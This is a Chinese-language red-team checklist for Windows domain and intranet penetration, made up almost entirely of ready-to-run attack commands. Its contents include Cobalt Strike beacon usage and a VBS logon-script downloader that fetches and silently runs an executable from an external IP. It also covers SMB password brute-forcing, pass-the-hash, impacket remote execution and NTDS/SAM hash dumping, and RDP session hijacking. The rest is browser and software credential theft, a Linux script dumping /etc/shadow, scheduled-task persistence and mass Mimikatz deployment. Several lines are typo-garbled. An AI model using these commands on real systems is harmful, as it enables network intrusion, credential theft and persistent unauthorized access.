- 来源于各位大佬,记录做checkList
内网渗透基本流程图:
域渗透 0~0.9:
[TOC]
获取域控权限后,定点打击运维:
至于如何导出 windows 日志,系统其实已经自带了一个非常好用的日志管理工具 即 wevtutil,下面这句话的意思就是把日志 id 为 4624[即登录成功的日志,大部分情况下我们只需要登录成功的]的日志在 4449183132[指定的时间换
算成对应的时间戳]这个时间以内的所有日志都导到指定目录下的 risalogs.evtx 文件中,然后再想办法把这个文件拖到本地来分析
# 域控导出日志:
beacon> shell hostname
beacon> shell wevtutil epl Security c:\windows\logs\risalogs.evtx /q:"*[EventData[Data[@Name='LogonType']='3'] and System[(EventID=4624) and TimeCreated[timediff(@SystemTime) <= 4449183132]]]"
beacon> shell tasklist | findstr "wevtutil.exe"
beacon> shell dir c:\windows\logs\risalogs.evtx
beacon> download c:\windows\logs\risalogs.evtx
beacon> downloads
# 本地日志筛洗:
LogParser.exe -i:EVT -o csv "SELECT TO_UPPERCASE(EXTRACT_TOKEN(Strings,5,'|')) as NAME,TO_UPPERCASE(EXTRACT_TOKEN(Strings,18,'|')) as IP FROM c:\risalogs.evtx" > C:\log.txt
# 筛选日志:
# grep -v '\$' log.txt | sort | uniq | egrep -v 'ANONYMOUS LOGON|-|:' > login_succeed.txt
# head -n 25 login_succeed.txt
# wc -l login_succeed.txt
例子:loecho 为例:
# grep 'loecho' login_succeed.txt # 筛选出登录IP
# 横向到指定机器-方法1:
beacon> shell net use \\WIN-HK0SO5MHHQ6\c$ /user:"study\Administrator" "hello.!@#45"
beacon> shell copy c:\windows\logs\dpx\cvsrds.exe \\WIN-HK0SO5MHHQ6\admin$\help\help\
beacon> shell dir \\WIN-HK0SO5MHHQ6\admin$\help\help\
beacon> shell wmiexec.exe study/Administrator:hello.!@#45@WIN-HK0SO5MHHQ6 "c:\windows\help\help\cvsrds.exe"
beacon> rm wmiexec.exe
beacon> rm cvsrds.exe
beacon> shell net use * /del /yes
# 横向到指定机器-方法2:
首先,想办法将目标主控机器的 beacon shell 弹回来,之后查看到当前域组策略脚本目录,即 NETLOGON 所对应的路径,等会儿的 vbs payload 就是要上传这个目录下,这样当目标下次重启登录时候就会自动加载执行里面的脚本
beacon> shell net time /domain 如何确定主控,在之前也有提过,net time 即可看到
beacon> shell hostname
beacon> shell net share # NETLOGIN脚本目录,上传上线vbs
trFileURL = "http://21.65.87.33:80/cvsrds.exe"
strHDLocation = "c:\windows\temp\cvsrds.exe"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1 'adTypeBinary
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0'Set the stream position to the start
Set objFSO = Createobject("Scripting.FileSystemObject")
If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
Set objFSO = Nothing
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
strComputer = "."
set ws=wscript.createobject("wscript.shell")
val=ws.run ("c:\windows\temp\cvsrds.exe",0
# 如下是最关键的一步,利用 dsmod 修改指定的目标域用户属性,即 给用户添加我们刚刚准备好的登录脚本,具体如下
beacon> shell dsquery user | findstr "boss"
beacon> shell dsmod user -loscr "info.vbs" "CN=boss,CN=Users,DC=god,DC=org"
beacon> shell gpupdate /force
# 一点扩展用法 [ 通过批处理,借助 dsmod,对指定的多个用户批量添加登录脚本,实现域内批量上线,当然啦,实际中并不建议一次种太多,建议有针对性的种 ]
# for /f %i in (user.txt) do dsmod user -loscr "info.vbs" "CN=%i,CN=Users,DC=god,DC=org"
# type user.txt
# 务必记得等所有目标机器都稳定上线之后,立即去把对应的登录脚本都删掉
批量WMI 无依赖横向(445爆破):
# for /f %i in (host.txt) do net use \\%i\admin$ /user:"administrator" "Admin12345" && if %errorlevel% equ 0 ( echo %i >> c:\windows\temp\login_succeed.txt ) && net use \\%i\admin$ /del
批量445抓Hash:
# for /f %i in (host.txt) do psexec \\%i -accepteula -u administrator -p Admin12345 -c C:\Tools\QuarksPwDump.exe -dhl -o C:\windows\temp\%i.txt && move /y \\%i\admin$\temp\%i.txt c:\windows\temp\
批量无依赖PTH:
# powershell -exec bypass
PS > IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-TheHash.ps1');
PS > IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/master/Invoke-WMIExec.ps1');
PS > Invoke-TheHash -Type WMIExec -Target 192.168.3.0/24 -Domain . -Username administrator -Hash ccef208c6485269c20db2cad21734fe7
批量上线CS:
for /f %i in (host.txt) do net use \\%i\admin$ /user:"administrator" "Admin12345" && copy C:\Tools\beacon.exe \\%i\admin$\temp\ && wmic /node:%i /user:administrator /password:Admin12345 PROCESS call create
"\\%i\admin$\temp\beacon.exe" && net use \\%i\admin$ /del
impaket 利用手册
0x01 Wmi
以明文密码或 pth 形式远程非交互命令执行
# python3 wmiexec.py ./administrator:'admin!@#45'@172.23.119.106 "quser" -codec gbk
# python3 wmiexec.py -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.91 'quser' -codec gbk
远程非交互执行 Cmd 或 PS 命令
# python3 wmiexec.py -shell-type cmd ./administrator:'admin!@#45'@172.23.119.81 "quser" -codec gbk
# python3 wmiexec.py -shell-type powershell -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.81 'get-host' -codec gbk
Cmd 或 PS, 远程交互式 shell
# python3 wmiexec.py -shell-type cmd ./administrator:'abc123!@#45'@172.23.119.109 -codec gbk
# python3 wmiexec.py -shell-type powershell -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.109 -codec gbk
加上执行时间标识, 输出详细调试信息(便于后续排查问题),[ 注,默认管道名易被杀软识别 ]
# python3 wmiexec.py -ts -debug ./administrator:'Admin12345'@172.23.119.86 "quser" -codec gbk
# python3 wmiexec.py -ts -debug -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.119 'net group "domain admins" /domain' -codec gbk
只执行命令,不获取命令结果, 走的单端口,避免由于 445 端口不通而导致整个执行失败
# python3 wmiexec.py -nooutput ./administrator:'abc123!@#45'@172.23.119.82 "quser > C:\Users\Public\Documents\logs.txt" -codec gbk
# python3 wmiexec.py -nooutput -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.82 'tasklist> C:\Users\Public\Documents\logs.txt' -codec gbk
0x02 Dcom
远程非交互命令执行,支持 ShellWindows, ShellBrowserWindow, MMC20 方法
# python3 dcomexec.py -ts -debug -object MMC20 ./administrator:'admin!@#45'@172.23.119.91 "quser" -codec gbk
# python3 dcomexec.py -ts -debug -hashes :9e62b88124f1d8f8025164799510bc7f -object MMC20 klion/sysadm:@172.23.119.91 "quser" -codec gbk
Dcom 远程交互 shell
# python3 dcomexec.py -ts -debug -object MMC20 ./administrator:'admin!@#45'@172.23.119.91 -codec gbk
# python3 dcomexec.py -ts -debug -hashes :9e62b88124f1d8f8025164799510bc7f -shell-type powershell -object MMC20 klion/sysadm:@172.23.119.91 -codec gbk 极易被拦截
0x03 计划任务
远程非交互命令执行, 默认 System 权限
# python3 atexec.py -ts -debug -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.91 "quser" -codec gbk
# python3 atexec.py -ts -debug ./administrator:'admin!@#45'@172.23.119.91 'dir c:\' -codec gbk
0x04 Smb
远程交互 shell, 默认 system 权限
# python3 smbexec.py -ts -debug -hashes :518B98AD4178A53695DC997AA02D455C ./administrator@172.23.119.81 -codec gbk
# python3 smbexec.py -ts -debug klion/sysadm:'admin!@#45'@172.23.119.81 -codec gbk
# python3 psexec.py -ts -debug -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.51 'net group "domain admins" /domain'
# python3 psexec.py -ts -debug ./administrator:'admin!@#45'@172.23.119.106 'net group "domain admins" /domain'
# python3 psexec.py -ts -debug ./administrator:'admin!@#45'@172.23.119.106 'net group "domain controllers" /domain'
0x05 远程抓 hash
抓本地 hash
远程在线抓 hash
# python3 secretsdump.py -hashes :518B98AD4178A53695DC997AA02D455C ./administrator@172.23.119.51 -outputfile 172.23.119.51.hash.txt
本地离线解 hash
# python3 wmiexec.py -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.51 -codec gbk
# cd c:\users\public\documents
# reg save HKLM\SYSTEM sys.hiv
# reg save HKLM\SAM sam.hiv
# reg save hklm\security security.hiv
# lget sys.hiv
# lget security.hiv
# lget sam.hiv
# python3 secretsdump.py -sam sam.hiv -security security.hiv -system sys.hiv LOCAL -outputfile 6.Hash.txt
导 ntds.dit
远程在线导 ntds.dit
# python3 secretsdump.py -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.120 -outputfile klion.local.ntds.txt
# python3 secretsdump.py klion/administrator:'Admin12345'@172.23.119.120 -outputfile klion.local.ntds.txt
本地离线解 ntds.dit
# python3 wmiexec.py -hashes :9e62b88124f1d8f8025164799510bc7f klion/sysadm@172.23.119.120 -codec gbk
# cd c:\users\public\documents
# vssadmin list shadows
# vssadmin create shadow /for=c:
# copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\NTDS\ntds.dit c:\users\public\documents\ntds.dit /Y
# vssadmin delete shadows /for=c: /quiet
# reg save hklm\system system.hiv
# lput gosecretsdump.exe
# gosecretsdump.exe -history -ntds ntds.dit -system system.hiv -out klion.local.txt 目标机上解
# python3 secretsdump.py -system system.hiv -ntds ntds.dit LOCAL -outputfile klion.ntds.dit 拖回来本地解
0x06 域外利用相关
# python3 GetUserSPNs.py klion.local/WenYa.xue:'xwy123!@#45' -dc-ip 172.23.119.120 -request Kerberoasting 利用
# python3 GetNPUsers.py klion.local/sysadm:'sys123!@#45' -dc-ip 172.23.119.120 -request AS-REPRoasting 利用
# python3 GetADUsers.py klion.local/sysadm:'sys123!@#45' -dc-ip 172.23.119.120 -all 抓取目标域内用户列表
# python3 findDelegation.py klion.local/sysadm:'sys123!@#45' -dc-ip 172.23.119.120 查询目标域内委派
# python3 lookupsid.py -ts ./administrator:'admin!@#45'@172.23.119.120 枚举目标系统用户列表(RPC)
# python3 netview.py -debug klion.local/sysadm:'sys123!@#45' -dc-ip 172.23.119.120 批量获取域内存活主机的用户登录记录
# python3 getTGT.py -debug klion.local/sysadm:'sys123!@#45' -dc-ip 172.23.119.120 获取指定域用户票据
# python3 getArch.py -target 192.168.159.11 查看目标系统位数
# python3 rpcdump.py ./administrator:'admin!@#45'@172.23.119.120 远程 Dump RPC 数据
0x07 远程提取目标 Exchange 邮箱信息
# python3 exchanger.py -rpc-hostname Ex2010SP3 klion/its:'admin!@#45'@192.168.159.12 nspi list-tables
# python3 exchanger.py -rpc-hostname Ex2010SP3 klion/its:'admin!@#45'@192.168.159.12 nspi dump-tables -guid 57f0c459-519c-47f8-9e1b-f83a1f8a51a8
GUEST用户劫持Administere-RDP
登录guest用户,使用rdp劫持登录administrator。
query user
sc create tide binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4" #1为目标会话id和当前会话名
net start tide
浏览器相关:
1. 浏览器下载记录
2. 浏览器历史记录
3. 浏览器保存的账号密码
4. 浏览器收藏夹标签
# Github项目
https://github.com/GhostPack/Seatbelt # 爬取浏览器收藏夹等机器其他敏感资产
https://github.com/moonD4rk/HackBrowserData # hackbrowserdata 是一个解密浏览器数据(密码|历史记录|Cookies|书签)的导出工具,支持全平台主流浏览器
https://github.com/AlessandroZ/LaZagne # LaZagne项目是用于开源应用程序获取大量的密码存储在本地计算机上
https://github.com/uknowsec/SharpDecryptPwd # 解密常用软件密码,例如navcat,wincap等
最近打开文件:
C:\Users[User]\AppData\Roaming\Microsoft\Windows\Recent
防火墙配置
netsh advfirewall show allprofiles
RDP连接记录
cmdkey /list
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\servers"
reg query "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\TERMINAL SERVER CLIENT\DEFAULT"
启动项查询
wmic startup get command,caption
REG QUERY HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
服务信息
wmic service list brief
查看是否开启DHCP或其他第三方服务
已安装程序
wmic product get name,version
rty name,version
powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name,version
敏感文件:
# Windows:
findstr /si password config.* *.ini *.txt *.properties
dir /a /s /b d:\"*.txt"
dir /a /s /b d:\"*.xml"
dir /a /s /b d:\"*.mdb"
dir /a /s /b d:\"*.sql"
dir /a /s /b d:\"*.mdf"
dir /a /s /b d:\"*.eml"
dir /a /s /b d:\"*.pst"
dir /a /s /b d:\"*conf*"
dir /a /s /b d:\"*bak*"
dir /a /s /b d:\"*pwd*"
dir /a /s /b d:\"*pass*"
dir /a /s /b d:\"*login*"
dir /a /s /b d:\"*user*"
# Linux
find / -name *.properties
grep -r "查询内容" 文件目录
#!/bin/bash
# by forum.ywhack.com
#输出文件
filename=$(date +%s)'.log'
echo "信息收集"
echo -e "\n" | tee -a $filename
echo "账户信息收集" | tee -a $filename
cat /etc/passwd | tee -a $filename
echo -e "\n" | tee -a $filename
echo "shadow" | tee -a $filename
cat /etc/shadow | tee -a $filename
echo -e "\n" | tee -a $filename
echo "进程信息收集" | tee -a $filename
ps aux | tee -a $filename
echo -e "\n" | tee -a $filename
echo "网络连接" | tee -a $filename
netstat -antlp | tee -a $filename
echo -e "\n" | tee -a $filename
echo "当前用户:" $(whoami) 2>/dev/null | tee -a $filename
echo -e "\n" | tee -a $filename
echo "端口监听" | tee -a $filename
netstat -lnpt | tee -a $filename
echo -e "\n" | tee -a $filename
echo "可登陆用户" | tee -a $filename
cat /etc/passwd | grep -E -v 'nologin$|false' | tee -a $filename
echo -e "\n" | tee -a $filename
echo "增加用户的日志" | tee -a $filename
grep "useradd" /var/log/secure | tee -a $filename
echo -e "\n" | tee -a $filename
echo "History操作提取" | tee -a $filename
cat ~/.*history | tee -a $filename
echo -e "\n" | tee -a $filename
echo "登录成功的IP" | tee -a $filename
grep "Accepted " /var/log/secure* | awk '{print $11}' | sort | uniq -c | sort -nr | more | tee -a $filename
echo -e "\n" | tee -a $filename
echo "查看路由表" | tee -a $filename
route -n | tee -a $filename
echo -e "\n" | tee -a $filename
echo "查看 SSH key" | tee -a $filename
sshkey=${HOME}/.ssh/authorized_keys
if [ -e "${sshkey}" ]; then
cat ${sshkey} | tee -a $filename
else
echo -e "SSH key文件不存在\n" | tee -a $filename
fi
echo -e "\n" | tee -a $filename
echo "查看 known_hosts" | tee -a $filename
cat ~/.ssh/known_hosts | tee -a $filename
echo -e "\n" | tee -a $filename
echo "查找WEB-INF" | tee -a $filename
find / -name *.properties 2>/dev/null | grep WEB-INF | tee -a $filename
echo -e "\n" | tee -a $filename
echo "user|pass|pwd|uname|login|db_" | tee -a $filename
find / -name "*.properties" | xargs egrep -i "user|pass|pwd|uname|login|db_" | tee -a $filename
echo -e "\n" | tee -a $filename
echo "jdbc:|pass=|passwd=" | tee -a $filename
find / -regex ".*\.properties\|.*\.conf\|.*\.config\|.*\.sh" | xargs grep -E "=jdbc:|pass=|passwd=" | tee -a $filename
echo -e "\n" | tee -a $filename
# Author cances
echo "ip和网卡信息" | tee -a $filename
ip a | awk '{print $2,$4}' | tee -a $filename
echo -e "\n" | tee -a $filename
echo "可登陆用户" | tee -a $filename
cat /etc/passwd | grep -E -v 'sync$|halt$|nologin$|false|shutdown' | tee -a $filename
echo -e "\n" | tee -a $filename
echo "用户登陆日志" | tee -a $filename
lastlog | tee -a $filename
echo -e "\n" | tee -a $filename
echo "查看 hosts" | tee -a $filename
cat /etc/hosts | tee -a $filename
echo -e "\n" | tee -a $filename
echo "查看 系统版本" | tee -a $filename
cat /etc/*-release | tee -a $filename
echo -e "\n" | tee -a $filename
echo "查看 内核版本" | tee -a $filename
uname -mrs | tee -a $filename
简易Windows网段探测:
@echo off
rem 内网存活段自动发现脚本 [Windows]
setlocal enabledelayedexpansion
for /l %%i in (0,1,255) do (
for /l %%k in (0,1,255) do (
ping -w 1 -n 1 10.%%i.%%k.1 | findstr "TTL=" >nul || ping -w 1 -n 1 10.%%i.%%k.254 | findstr "TTL=" >nul
if !errorlevel! equ 0 (echo 10.%%i.%%k.0/24 is alive ! >> alive.txt ) else (echo 10.%%i.%%k.0/24 May be sleeping ! )
)
)
for /l %%s in (16,1,31) do (
for /l %%d in (0,1,255) do (
ping -n 1 -w 1 172.%%s.%%d.1 | findstr "TTL=" >nul || ping -w 1 -n 1 172.%%s.%%d.254 | findstr "TTL=" >nul
if !errorlevel! equ 0 (echo 172.%%s.%%d.0/24 is alive ! >> alive.txt ) else (echo 172.%%s.%%d.0/24 May be sleeping ! )
)
)
for /l %%t in (0,1,255) do (
ping -n 1 -w 1 192.168.%%t.1 | findstr "TTL=" >nul || ping -n 1 -w 1 192.168.%%t.254 | findstr "TTL=" >nul
if !errorlevel! equ 0 (echo 192.168.%%t.0/24 is alive ! >> alive.txt ) else (echo 192.168.%%t.0/24 May be sleeping ! )
)
基础维权-自启动:
REG query "HKLMSOFTWARE\Microsoft\WindowslCurrent Version\Run"
REG ADD "HKLMSOFTWARE\Microsoft\WindowslCurrentVersion\Run"/V"SysDebug"/t REG_SZ/F /D"c:\windows\debug\SysDebug.exe
reg delete "HKLMSOFTWARE\Microsoft\WindowslCurrentVersion\Run"/V"SysDebug"/f
高权限计划任务:
schtasks /create /RL HIGHEST /F /tn "SysDebug" /tr "c:\windows\debug\SysDebug.exe"/sc DAILY /mo 1 /ST 10:05/RU SYSTEM
schtasks /query I findstr "SysDebug"
schtasks /run /tn "SysDebug"
schtasks /delete /F /tn "SysDebug"
schtasks /tn "SysDebug" /query /fo list/v
低权限计划任务:
schtasks /create/F/tn"SysDebug"/tr"D:\用户文档\sixj\ContactslSysDebug.exe"/sc DAILY/mo1/ST10:05
schtasks /query I findstr "SysDebug"
schtasks /run /tn "SysDebug"
schtasks/delete/F/tn"SysDebug"
schtasks /tn "SysDebug" /query /fo list /v
单机信息收集:
# 1. 基础的各类文件,关键字定位:
getFile.exe all # 自研文件查找工具
# 2. 主机安装的软件,确定主机类型:
wmic OS get Caption,CSDVersion,Version,OSArchitecture
# 3. 一把soha,拖回本地分析
Seatable.exe all #
# 4. 重点关注进程中敏感软件,确认是否存在凭证
tasklist /svc | findstr "*Mail*","KeePass"
AD域渗透-重中之重
findstr /c:"userName=" /c:"cpassword="/si Nad\sysvol\xxxx.com\policiesl*.xml
net time/domain&&net view ad&&dir lladNETLOGON&&type llad\NETLOGONchapwd.cmd
AD域渗透-域内信息收集:
powershell-import/home/xxxx/Desktop/SharpHound.ps1
powershell Invoke-BloodHound-CollectionMethod All
execate assembly BloodHound.exe
AD域渗透-获取用户票据、凭证:
# 通过vbs获取:
cscript GetUserSPN.vbs
# 通过Rubeus获取服务票据Hash,hashcat离线爆破:
Rubues.exe kerberoast
hashcat.exe -m 13100 hash.txt -a 3 -1 ?1?d?s?1?1?1?1?1?1
AD域渗透-SMB扫描(快速获取内网Windows)
1.原始nbtscan.exe,实战需要处理:
nbtscan.exe 10.10.10.0/16 >> smb.txt
2. fscan.exe, 实战也要处理:
fscan.exe -h 10.10.10.0/16 -m nbtbios -o smb.txt
3. 苛刻环境,正向代理:
msf代理进去,线程拉低10,选择模块smb_version探测
4. cme Windows主机探测,实战自行编译免杀处理
cme.exe -t 10.10.10.0/24
tasklist /svc | findstr "cme.exe"
5. SharpNetInfoScan 基于139端口解析:
SharpNetInfoScan.exe -h 10.10.10.10/24
6. 基于SPN结果,进行windows探测:
grep 'CN=' spn.txt | awk -F ','{'print $1'} | awk -F '=' {'print$2'} > host.txt
tail -n 30 host.txt
for /f "delims=" %i in host.txt do @ping -w 1 -n 1 %i | findstr /c:".xxx.com|" >> host_res.txt
# Windwos 7 以后都默认自带setspn
setspn T DC-Name Q */* | findstr "MSSQLSvc" # 直接过滤Mssql服务
# 因为得到的spn结果,可能都不存活,我们批量Ping一下,判断存活
awk F "/" {'print $2'} mac.txt | awk F "." {'print $1'} | uniq > res.txt
for /f "delims=" %i in (res.txt) do @ping w 1 n 1 %i | findstr /c:" DC-name " >> PerfLogs news.txt
setspn T dc-name Q */* | findstr "oracle" # 同理过滤“Oracle服务”,其他同类数据库服务也如此
借助 SPN 快速 定位当前目标 域中 所有 存活 的 ldap 服务器:
# 通常情况下,都为域控制器
setspn T dc-name Q */* | findstr "ldap" # 所有 LDAP SPN 的 机器名 都带有典型 的 DC 字样
借助 SPN 快速 定位当前目标 域中 邮件 服务器:
setspn T dc-name Q */* | findstr "exchangeMDB"
setspn T dc-name Q */* | findstr "SMTPSVC"
setspn T dc-name Q */* | findstr "IMAP"c v
setspn T dc-name Q */* | findstr "POP3"
awk F '/' {'print $2'} mail.txt | awk F '.' {'print $1'} | uniq # 筛选各类主机名
# 批量存活探测
for /f "delims=" %i in (mail.txt) do @ping w 1 n 1 %i | findstr /c:" dc-name " >> mail-re.txt
借助 SPN 快速 定位当前目标 域中 Web 服务器:
setspn T dc-name Q */* | findstr "HTTP"
setspn T dc-name Q */* | findstr "HTTPS"
for /f "delims=" %i in (webs.txt) do @ping w 1 n 1 %i | findstr /c:" dc-name " >> # Web服务
借助 SPN 快速 定位当前 目标 域 中 所有 存活的 DNS 服务器
setspn T dc-name Q */* | findstr "DNS"
for /f "delims=" %i in (dns.txt) do @ping w 1 n 1 %i | findstr /c:" dc-name " >> dns.txt
借助 SPN 快速 定位当前 目标 域 中 所有 存活的 文件 服务器
setspn T dc-name Q */* | findstr "ftp"
setspn T dc-name Q */* | findstr "nfs"
for /f "delims=" %i in (ftp.txt) do @ping w 1 n 1 %i | findstr /c:" dc-name " >> dns.txt
借助 SPN 快速 定位当前 目标 域 中 所有 开启远程 连接服务 服务器
setspn T dc-name Q */* | findstr "TERMSRV" >>> PerfLogs rdp .txt
setspn T dc-name Q */* | findstr "WSMAN" >> C: PerfLogs winrm .txt
setspn T dc-name Q */* | findstr "vnc" >> C: PerfLogs vnc .txt
setspn T dc-name Q */* | findstr "vpn" >> C: PerfLogs vpn .txt
setspn T dc-name Q */* | findstr "tnetdgines" >> C: PerfLogs tnetdgines .txt
awk F '/' {'print $2'} **.txt | awk F '.' {'print $1'} | uniq | wc -l
AD域渗透-外网资产/内网资产定位:
grep 'CN=' spn.txt | awk -F ','{'print $1'} | awk -F '=' {'print $2'} > host_res.txt
# Linux:(筛选重点主机)
egrep -i 'sql|file|vpn|mail|smtp|pop|imap|web|share|monitor|erp|login|oa|print|server|vcenter|vm'
# 准备目标外网各类域名,汇总文件domain.txt
for /f "delims=" %i in (domain.txt) do @ping -w 1 -n 1 %i | findstr /c:"[10." /c:"[192." /c:"[172." >> web-out.txt
# 通过以上的方法获取到大致的C段,批量进行webTitle识别,确定对应段的各类应用:
1. fscan获取WebTitle/指纹
fscan.exe -hf target.txt -nopoc -nop -o title.txt
2. Ladon
Ladon.exe WhatWeb 10.10.10.0/16 >> title.txt
3. 苛刻环境,存活探测:
for /l %i in (1,1,255) do @ping 192.168.0.%i -w 1 -n 1 | find /i "ttl"导出成文本: @for /l %i in (1,1,255) do @ping -n 1 -w 40 192.168.0.%i & if errorlevel 1 (echo 192.168.0.%i>>c:\a.txt) else (echo 192.168.0.%i >>c:\b.txt)
AD域渗透-信息收集
贯穿横向每个阶段,拿到一部分权限,就来一次
1. 批量抓进程,筛选敏感进程,敏感用户,有大概六直接伪造Token实现获取域控权限:
(1) atexec 实现获取进程列表,保存本地,手工筛选
## 本机操作:
mimikatz进行注入,注入目标主机票据,把本机挂代理进去,后续进行操作:
atexec.exe ./administrator:loecho@123..@10.10.10.1 "tasklist"
## 被控机操作:
将当前Beacon注入到对应进程,获取目标权限
atexec.exe ./administrator:loecho@123..@10.10.10.1 "tasklist"
## 1. 批量抓,假设用户密码一样,后续筛选重点进程:
for /f " %i in win2success.txt do atexec.exe ./administrator:loecho123..@i >> allTasklist.txt
# 筛选重点进程,杀软、数据库、phpstudy、vpn、域管用户(域管理员实际目标名称添加)等等
egrep 'cily|adadmin|adadmin02|xxxx-igrp|leagsoft|shenluyan|xiefp|wulh|sunyingyun|zhangx' process.txt
## 2. 不依赖工具抓,自身tasklist
for /f %i in (ip.txt) do echo %i >> process.txt & tasklist /s %i/u ".\administrator" /p "loecho123.." /V /FO CSV >> process.txt
egrep 'cily|adadmin|adadmin02|xxxx-igrp|leagsoft|shenluyan|xiefp|wulh|sunyingyun|zhangx' process.txt
- 批量抓已获取口令主机的Hash、密码:
(抓密码工具一定要免杀,或者你直接把lsass.exe Dump下离线解密也可以)
手工搞,依赖计划任务,files64.exe为修改版免杀MImikatz一键版本:
for /f %i in (ip.txt) do net use N%i\admin$/user:"administrator" "IT1231" & if %errorlevel% equ 0(copy files64.exe \%iladmin$\debug\/Y)& schtasks /create/s"%i"/u "administrator"/p "IT1231" /RL HIGHEST /F/tn"SysDebug"/tr"c:\windows\debug\files64.exe"/sc DAILY/mo1/ST07:25/RUSYSTEM&schtasks/run/tnSysDebug/s"%i"/U "administrator"/P "IT1231"& schtasks/delete/F/tn SysDebug/s"%i"/U"administrator"/P"IT1231"&@ping 127.0.0.0.1 -n 1 >nul & move W%i\admin$\temp\dumps.logs C:\Users\Public\%i.logs & del W%i\admin$\debug\files64.exe/F&net use N%i\admin$/del
(2) WMIC直接搞
for /f %i in (ip.txt) do net use 11%i\adminS/user:"administrator" "IT1231" & if %errorlevel% equ 0(copy files64.exe ll%i\admin$\debug\/Y) & wmic/NODE:"%i" /user:"administrator" /password:"IT1231" PROCESS call create "c:\windows\debug\files64.exe" & @ping 127.0.0.1-n3>nul & move N%i\adminS\temp\dumps.logs C:\Users\Publicl%i.logs & del 11%iladminS\debuglfiles64.exe/F net use N%iladmin$/del
(3) 依赖SharpKatz工具,免杀处理:
SharpKatz_x64.exe -h
Example: SharpKatz.exe --Command logonpasswords
Example: SharpKatz.exe --Command ekeys
Example: SharpKatz.exe --Command msv
Example: SharpKatz.exe --Command kerberos
Example: SharpKatz.exe --Command tspkg
Example: SharpKatz.exe --Command credman
Example: SharpKatz.exe --Command wdigest
Example: SharpKatz.exe --Command dcsync --User user --Domain userdomain --DomainController dc
Example: SharpKatz.exe --Command dcsync --Guid guid --Domain userdomain --DomainController dc
Example: SharpKatz.exe --Command dcsync --Domain userdomain --DomainController dc
Example: SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash
Example: SharpKatz.exe --Command pth --User username --Domain userdomain --Rc4 rc4key
Example: SharpKatz.exe --Command pth --Luid luid --NtlmHash ntlmhash
Example: SharpKatz.exe --Command pth --User username --Domain userdomain --NtlmHash ntlmhash --aes128 aes256
Example: SharpKatz.exe --Command zerologon --Mode check --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$
Example: SharpKatz.exe --Command zerologon --Mode exploit --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$
Example: SharpKatz.exe --Command zerologon --Mode auto --Target WIN-NSE5CPCP07C.testlab2.local --MachineAccount WIN-NSE5CPCP07C$ --Domain testlab2.local --User krbtgt --DomainController WIN-NSE5CPCP07C.testlab2.local
Example: SharpKatz.exe --Command printnightmare --Target dc --Library \\mycontrolled\share\fun.dll
Example: SharpKatz.exe --Command printnightmare --Target dc --Library \\mycontrolled\share\fun.dll --AuthUser user --AuthPassword password --AuthDomain dom
Example: SharpKatz.exe --Command hiveghtmare
Example: SharpKatz.exe --Command dumpsam --System \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM --Sam \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
Example: SharpKatz.exe --Command listshadows
(4) 各类软件密码解密:
360 安全浏览器
Chrome 解密
Firefox 解密
Flashfxp 解密
Foxmail 邮件客户端解密
IIS 解密
MobaXterm 解密
Navicat 解密
PlSQL解密
Royal TS 离线解密
SecureCRT 解密
SSMS 客户端解密
Thunderbird 离线解密
TortoiseSVN 解密
VNC 解密
WinSCP 解密
Xshell Xftp 解密
# MySQL数据库:
1. 将目标mysql/data/mysql/user.MYD mysql/data/mysql/user.frm mysql/data/mysql/user.MYI 下载回本地
2. 拖到自己mySQL的对应目录下,修改参数:skip-grant-tables
3. 连接数据库,查询select host,user,password from user,CMD5查一下对应Hash
# MSSQL数据库:
1. mimikatz"privilege::debug"sekurlsa:pth/user:administrator/domain:./ntlm:hash /run:\"C:\*\SocksCap64\SocksCap64_RunAsAdmin.exel"" "exit"
2. 代理挂进去,通过Windows身份认证直接连接,MSSQL数据库
AD域渗透-横向渗透WINRM(5985):
条件:
1、适用于 win7 及以后的系统,win7 和 server 08 默认关闭
2、server 12 之后的版本才默认允许远程任意主机进行管理
3、防火墙未过滤 5985、5986 端口
1. 自带工具:
#查看WinRM状态
winrm enumerate winrm/config/listener
#开启WinRM远程管理
Enable-PSRemoting –force
#设置WinRM自启动
Set-Service WinRM -StartMode Automatic
#对WinRM服务进行快速配置,包括开启WinRM和开启防火墙异常检测,默认的5985端口
winrm quickconfig -q
#对WinRM服务进行快速配置,包括开启WinRM和开启防火墙异常检测,HTTPS传输,5986端口
winrm quickconfig -transport:https
#查看WinRM的配置
winrm get winrm/config
#查看WinRM的监听器
winrm e winrm/config/listener
#为WinRM服务配置认证
